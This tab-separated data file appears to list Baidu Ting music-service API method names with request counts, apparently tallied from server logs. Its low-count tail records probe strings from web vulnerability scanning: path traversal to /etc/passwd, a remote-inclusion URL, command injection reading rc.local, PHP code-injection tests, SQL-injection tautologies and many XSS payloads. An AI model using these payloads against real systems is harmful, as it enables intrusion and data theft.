baidu.ting.song.getInfos	60595810
baidu.ting.search.lrcpic	25560280
baidu.ting.song.baseInfo	25033285
baidu.ting.search.common	19238192
baidu.ting.search.catalogSug	18484803
baidu.ting.user.listenAge	18437445
baidu.ting.song.play	16795854
baidu.ting.outerPassport.profile	15188082
baidu.ting.song.down	8455784
baidu.ting.song.lry	7845343
baidu.ting.user.getUserBaseInfo	7681651
baidu.ting.artist.getSongList	5497636
baidu.ting.favorite.isCollect	5195217
baidu.ting.song.getInfo	4958819
baidu.ting.artist.getList	4866071
ting.baidu.diy.getPlaylists	4636875
baidu.ting.billboard.billList	4429785
baidu.ting.search.lrcys	4268575
baidu.ting.user.config	3933114
baidu.ting.search.getPhotoInfos	3847222
baidu.ting.game.gamedetail	3472201
baidu.ting.plaza.getRecommendAlbum	3123722
baidu.ting.active.start	2856592
baidu.ting.user.checkComVersion	2799073
baidu.ting.artist.getInfo	2724711
baidu.ting.plaza.active	2699264
baidu.ting.radio.playAction	2551780
baidu.ting.user.checkSuggestVersion	2544652
	2366279
baidu.ting.diy.gedanInfo	2288573
baidu.ting.plaza.getFocusPic	2058401
baidu.ting.user.getMessage	1891652
baidu.ting.diy.gedanHot	1712735
baidu.ting.user.registToUC	1563173
baidu.ting.search.suggestion	1406327
baidu.ting.diy.category	1341284
ting.baidu.plaza.recdaily	1318745
baidu.ting.artist.getinfo	1301727
baidu.ting.album.getAlbumInfo	1285844
baidu.ting.diy.addListenCount	1120329
baidu.ting.plaza.recdaily	1109425
baidu.ting.radio.getChannelSong	1091996
baidu.ting.diy.getSongFromOfficalList	1079638
baidu.ting.favorite.getCollectSong	1028138
baidu.ting.plaza.getPartDesc	894981
baidu.ting.feedback.song	894433
baidu.ting.vip.checkVIPPromotion	881757
baidu.ting.artist.getAlbumList	833873
baidu.ting.user.down	755033
baidu.ting.user.RegistToImsg	717169
baidu.ting.diy.getNowOfficalList	654980
baidu.ting.tag.songlist	647105
baidu.ting.song.audio	643881
baidu.ting.diy.gedan	615951
baidu.ting.tag.getHotTag	566048
baidu.ting.song.buffer	466569
baidu.ting.radio.getCategoryList	436052
baidu.ting.billboard.billCategory	379704
baidu.ting.search.lrcyss	337825
baidu.ting.diy.getPlaylists	316531
baidu.ting.search.getPhotoInfo	298823
baidu.ting.game.gamelist	255454
baidu.ting.plaza.recommend	195322
baidu.ting.artist.get72HotArtist	183602
baidu.ting.song.getMulInfos	170106
baidu.ting.favorite.getFavoriteSong	162377
baidu.ting.favorite.addSongFavorites	131650
baidu.ting.mv.getIndexMV	121846
baidu.ting.favorite.addSongFavorite	102808
baidu.ting.diy.search	101298
baidu.ting.tag.getAllTag	101267
baidu.ting.video.getList	92903
baidu.ting.diy.getSimilarGedan	90892
baidu.ting.video.play	74110
baidu.ting.diy.getOfficialDiyList	71950
baidu.ting.user.checkVersion	51287
baidu.ting.favorite.delCollectSong	43834
baidu.ting.plaza.getNewSongs	39974
baidu.ting.artist.getInfoList	36119
baidu.ting.mv.playMV	35248
ting.baidu.diy.getPlaylist	33750
baidu.ting.artist.getSpecialSongList	32028
baidu.ting.radio.getArtistChannelSong	26745
baidu.ting.radio.getFavoriteSong	24656
baidu.ting.song.getMulInfo	22930
baidu.ting.feedback.crash	16523
baidu.ting.diy.getPlaylist	15808
baidu.ting.plaza.getArtistPlaza	15391
baidu.ting.radio.serv	15187
baidu.ting.artist.getHighSongTitle	12368
baidu.ting.diy.saveList	11525
baidu.ting.album.getList	10211
baidu.ting.mv.searchMV	8712
baidu.ting.song.cloud	8289
ting.baidu.film.getFilmInfo	8142
baidu.ting.favorite.delSongFavorite	7298
baidu.ting.video.category	7146
baidu.ting.artist.getQianQianArtist	6428
baidu.ting.diy.addListSong	5316
baidu.ting.diy.delListSong	5282
baidu.ting.user.nplogin	5193
baidu.ting.diy.delList	4848
baidu.ting.weixin.response	4608
baidu.ting.billboard.catalog	4226
baidu.ting.user.logout	4197
baidu.ting.colorRing.listen	3980
baidu.ting.artist.getHighSongList	3397
baidu.ting.user.regPassport	3090
baidu.ting.colorRing.getCode	2797
ting.baidu.artistapp.renum	2717
baidu.ting.colorRing.authset	2339
baidu.ting.song.playAAC	2301
baidu.ting.user.getMobileVcode	2144
baidu.ting.favorite.delSongFavorites	2068
baidu.ting.diy.getRecommendSpeical	1728
baidu.ting.mv.getMultiSongMVInfo	1700
baidu.ting.feedback.info	1564
baidu.ting.artist.getSong	1303
baidu.ting.artist.getSongRank	1302
baidu.ting.favorite.getFavoriteAlbum	1279
baidu.ting.vip.checkUserExchange	1116
baidu.ting.cloud.checkFile	985
baidu.ting.cloud.record	906
baidu.ting.diy.addList	844
baidu.ting.song.getPic	837
baidu.ting.mv.getMVCategory	788
ting.baidu.artistapp.brief	626
ting.baidu.search.lrcpic	595
baidu.ting.favorite.getListenHistory	589
baidu.ting.video.recMv	579
baidu.ting.colorRing.subscribe	411
baidu.ting.diy.upList	402
baidu.ting.colorRing.toneset	348
baidu.ting.favorite.getOffenListenList	336
ting.baidu.plaza.getFocusPic	288
baidu.ting.user.activate	261
baidu.ting.artist.getInfoByName	253
baidu.ting.song.getSuoSongInfo	228
baidu.ting.vip.exchangeVIP	217
baidu.ting.artistapp.photo	199
baidu.ting.cloud.signature	175
baidu.ting.favorite.getInfoFromView	170
baidu.ting.user.login	146
baidu.ting.song.getHash	107
baidu.ting.favorite.addAlbumFavorite	106
baidu.ting.cloud.expand	102
baidu.ting.user.addPassportInfo	96
ting.baidu.artistapp.news	86
ting.baidu.artistapp.newList	84
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	82
baidu.ting.album.getAlbumstyle	46
baidu.ting.plaza.getMisNewSong	40
ting.baidu.artistapp.briefs	39
baidu.ting.favorite.delAlbumFavorite	18
\' (	15
(	15
baidu.ting.game.catalog	14
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	9
ting.baidu.artistapp.send	7
baidu.ting.active.start?wap.10010.com	6
baidu.ting.user.config?wap.10010.com	6
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
../../../../../../../../../../etc/rc.d/rc.local_	5
../../../../../../../../../../etc/rc.d/rc.local	5
file:///etc/passwd	5
../../../../../../../../../../etc/passwd_	5
../../../../../../../../../../etc/passwd	5
set	5
http://cirt.lnet/rfiinc.txt_	5
http://cirt.lnet/rfiinc.txt	5
${@print(md5(812812))}	5
c:/windows/win.ini	5
file:///etc/rc.d/rc.local_	5
data://text/plain;base64,dGVzdA==_	5
data://text/plain;base64,dGVzdA==	5
1\\\";cat /etc/rc.d/rc.local;\\\"	5
file:///etc/rc.d/rc.local	5
file:///etc/passwd_	5
string:{var_dump(md5(812812))}	5
1;cat /etc/rc.d/rc.local;	5
c:/windows/win.ini_	5
%{	5
${	5
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	5
/usr/bin/id;	5
\'];${@print(md5(812812))};//	5
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	5
baidu.ting.song.play\';alert(1);\'	4
baidu.ting.song.lry\';alert(1);\'	4
1\';cat /etc/rc.d/rc.local;\'	4
../../../../../../../../../../etc/passwd_.html	3
baidu.ting.song.play\') and 8288=8288 and (\'	3
baidu.ting.game.gameplay	3
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	3
baidu.ting.song.play\' and \'8281\'=\'8281	3
baidu.ting.game.gamedetail?wap.10010.com	3
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	3
baidu.ting.diy.category?wap.10010.com	3
baidu.ting.song.play;alert(1);//	3
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	3
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	3
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	2
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.play</script><script>alert(1);//	2
baidu.ting.song.play<script>confirm(1)</script>	2
baidu.ting.song.lry</script><script>alert(1);//	2
baidu.ting.song.lry<script>confirm(1)</script>	2
data://text/plain;base64,dGVzdA==_.jpeg	2
baidu.ting.song.playjavascript:alert(1)	2
baidu.ting.song.lryjavascript:alert(1)	2
baidu.ting.song.play\'\";alert(1);//	2
file:///etc/passwd_.php	2
baidu.ting.song.lry\'\";alert(1);//	2
file:///etc/passwd_.jpg	2
baidu.ting.song.play\";alert(1);\"	2
c:/windows/win.ini_.htm	2
http://10.42.7.217/?1387803685.38	2
http://10.42.7.217/?1387796156.98	2
baidu.ting.song.lry\";alert(1);\"	2
http://10.42.7.217/?1387796141.46	2
http://10.42.7.217/?1387780322.08	2
http://10.42.7.217/?1387780284.78	2
baidu.ting.user.config?.10010.com	2
http://cirt.lnet/rfiinc.txt_.php	2
baidu.ting.song.lry;alert(1);//	2
file:///etc/rc.d/rc.local_.htm	2
ting.baidu.song.getInfos	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
ting.baidu.song.down	2
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	2
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
baidu.ting.song.lry--></script><script>alert(1)</script>	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
../../../../../../../../../../etc/rc.d/rc.local_.html	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	1
../../../../../../../../../../etc/passwd_.php	1
../../../../../../../../../../etc/passwd_.htm	1
baidu.ting.song.lry\') and 8288=8288 and (\'	1
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	1
baidu.t2WGVoEXYLdbi/tNM0Ta 5t5lEy5I8OMAXW/	1
baidu.ting.song.lry\' and \'8281\'=\'8281	1
data://text/plain;base64,dGVzdA==_.html	1
data://text/plain;base64,dGVzdA==_.php	1
data://text/plain;base64,dGVzdA==_.jpg	1
baidu.ting.search.catalogSue	1
baidu.ting.game.gamelist?wap.10010.com	1
baidu.ting.feedback.song?wap.10010.com	1
baidu.ting.plaza.active?wap.10010.com	1
baidu.ting.game.gamedetail?.10010.com	1
baidu.ting.video.play?songid=8513517	1
c:/windows/win.ini_.php	1
baidu.ting.push.send	1
baidu.ting.diy.category?.10010.com	1
baidu.ting.active.start?.10010.com	1
http://cirt.lnet/rfiinc.txt_.jpeg	1
http://cirt.lnet/rfiinc.txt_.html	1
http://cirt.lnet/rfiinc.txt_.jpg	1
file:///etc/rc.d/rc.local_.html	1
ting.baidu.diy	1
baidu.thng.user.checkComVersion	1
file:///etc/rc.d/rc.local_.php	1
file:///etc/rc.d/rc.local_.jpg	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.php	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	1
file:///etc/passwd_.html	1
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	1
../../../../../../../../../../etc/rc.d/rc.local_.php	1
../../../../../../../../../../etc/rc.d/rc.local_.jpg	1
c:/windows/win.ini_.jpeg	1
c:/windows/win.ini_.html	1
baidu.ting.%0	1
baidu.tæº_	1
